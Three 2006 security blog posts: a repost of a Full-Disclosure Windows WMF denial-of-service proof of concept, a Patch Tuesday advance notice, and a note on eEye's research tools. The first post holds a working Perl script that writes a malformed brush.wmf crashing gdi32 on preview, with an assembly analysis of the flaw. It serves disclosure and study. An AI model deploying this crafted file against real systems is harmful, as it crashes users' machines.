First off... you'll noticed I put exploit in quotes... I haven't investigated this yet.... That's my plan for this evening... It's a crash which means a DoS.... whether you consider that an exploit or not is up to you...
Here's the original posting from FD
| quote: |
Posted by: cyanid-E
Description:
yet another 'windows meta file' (WMF) denial of service exploit.
System affected:
+ Windows XP SP2,
+ Windows 2003 SP1,
+ Windows XP SP1,
+ Windows XP
+ Windows 2003
Tech info:
page fault in gdi32!CreateBrushIndirect() because invalid pointer access.
Incorrect (short) to (void*) sign extension also present.
Exploit:
=== begin of brush.pl ===
#!/usr/bin/perl
print "\nWMF PoC denial of service exploit by cyanid-E ";
print "\n\ngenerating brush.wmf...";
open(WMF, ">./brush.wmf") or die "cannot create wmf file\n";
print WMF " \x01\x00\x09\x00\x00\x03\x22\x00\x00\x00\x63\x79\x
61\x6E\x69\x64";
print WMF " \x2D\x45\x07\x00\x00\x00\xFC\x02\x00\x00\x00\x00\x
00\x00\x00\x00";
print WMF " \x08\x00\x00\x00\xFA\x02\x00\x00\x00\x00\x00\x00\x
00\x00\x00\x00";
print WMF " \x07\x00\x00\x00\xFC\x02\x08\x00\x00\x00\x00\x00\x
00\x80\x03\x00";
print WMF "\x00\x00\x00\x00";
close(WMF);
print "ok\n\nnow try to browse folder in XP explorer and wait  \n";
=== end of brush.pl ===
Just run brush.pl and try to preview brush.wmf (or even browse folder
with brush.wmf in windows explorer).
Discovered:
06/24/2006; vendor informed but not answered |
Further information from FD:
| quote: |
| 1. 'Bad' wmf record:
07 00 00 00
length of record (in words)
FC 02
type (CreateBrushIndirect)
08 00 00 00 00 00 00 80
'packed' (good old Win16 days) LOGBRUSH data:
08 00 - 'packed' lpStyle (may be BS_DIBPATTERNPT [6] or BS_DIBPATTERN8X8 [8])
00 00 00 00 - COLORREF (any)
00 80 - 'packed' lbHatch (any, signed)
2. Sign extension bug:
_CommonEnumMetaFile:
......
; normalize 'packed' LOGBRUSH
movzx eax, word ptr [ebx+6] ; lbStyle (UINT32(UINT16))
mov [ebp-0f8], eax
mov eax, [ebx + 8] ; COLORREF (as is)
mov [ebp-0f4], eax
movsx eax, word ptr [ebx+0c] ; < -- BUGBUG: lbHatch (UINT32(INT16))
lea eax, [ebp-0f8]
push eax
call _CreateBrushIndirect
......
3. Memory access to fake 'pointer to packed DIB' (lbHatch) bug:
cmp edi, 6 ; BS_DIBPATTERNPT == lbStyle
jz _go2crush
......
cmp edi, 8 ; BS_DIBPATTERN8X8 == lbStyle
jz _go2crush
......
_go2crush:
push esi
push 1
push eax, [ebp+10]
push eax
push dword ptr [ebp+0c] ; 1
push dword ptr [ebp+18] ; lpHatch (fake *packedDIB)
call _pbmiConvertInfo
......
......
_pbmiConvertInfo:
......
push ebx
mov ebx, [ebp+8] ; lpHatch (fake *packedDIB)
......
mov eax, [ebx] ; < -- BUGBUG: crush or random (in first 0x7f00 bytes)
; memory access (see @ 0x3000 region)
|
I'll keep people informed as I play with it...
Peace,
HT
This Tuesday is the second Tuesday of the month, and like every other month that means it's time again for Patch Tuesday.
This time it looks bad... 12 Updates, 10 for Windows and 2 for Office... lately the turn around for PoCs and working exploits going public seems to be less than two weeks... HD Moore was 9 days on RASMAN, a couple had detailed enough explanations in the advisories that "discoverers" put out last time that working exloits could have easily been writen... This is a large number of updates for one time.... More updates means a better chance of missing one or something messin' up. When you consider that from Jan - July we had ony 39 updates in total.... we're now adding 12 more.. That's 23.5% of all updates released up to and including this august release... 8 months of updates and nearly 1/4 of them are coming out in a single month...
I'm going to put in some time this weekend catching up on the mailing lists see if I missed anything that could be assumed to lead to a Patch Tuesday update.... I'll post anything I find..
Here's the MS Advance Notice Bulletin
| quote: |
Summary
=======
On 8 August 2006 Microsoft is planning to release:Security Updates. Ten Microsoft Security Bulletins affecting Microsoft Windows.
The highest Maximum Severity rating for these is Critical. These
updates will be detectable using the Microsoft Baseline Security
Analyzer and the Enterprise Scan Tool. Some of these updates will
require a restart.
. Two Microsoft Security Bulletins affecting Microsoft Office.
The highest Maximum Severity rating for these is Critical. These
updates will be detectable using the Microsoft Baseline Security
Analyzer. These updates may require a restart.
Microsoft Windows Malicious Software Removal Tool
. Microsoft will release an updated version of the Microsoft
Windows Malicious Software Removal Tool on Windows Update, Microsoft
Update, Windows Server Update Services and the Download Center.
Note that this tool will NOT be distributed using Software Update
Services (SUS).
Non-security High Priority updates on MU, WU, WSUS and SUS
. Microsoft will not release any NON-SECURITY High-Priority
Updates for Windows on Windows Update (WU) and Software Update
Services (SUS).
. Microsoft will release twoNON-SECURITY High-Priority Updates
on Microsoft Update (MU) and Windows Server Update Services (WSUS).
Although we do not anticipate any changes, the number of bulletins,
products affected, restart information and severities are subject to
change until released. |
Peace,
HT
This just came across bugtraq and vuln-dev and it's definately cool. eEye has created a new research site showcasing their advisories and many of their tools (some of which were previously internal only).
I'm really looking forward to playing with the Binary Diffing Suite.
The eEye Binary Diffing Suite (EBDS) is a free and open source set of utilities for performing automated binary differential analysis. This becomes very useful for reverse engineering patches as well as program updates.
SysRQ2 is also looking pretty neat.
SysRq is a bootable CD image that allows a user to open a fully privileged (SYSTEM) command prompt on Windows 2000, Windows XP, and Windows Server 2003 systems by pressing Ctrl+Shift+SysRq at any time after startup.
The last one I plan on checking out rather quickly is Faultmon.
Faultmon is a simple command-line utility that monitors exceptions within a process. Whereas a conventional debugger will display an alert and freeze execution when an exception occurs, Faultmon writes basic contextual information to stdout and allows execution to continue automatically (although it can be made to pause as well).
Check out the site @ http://research.eeye.com/.
Peace,
HT
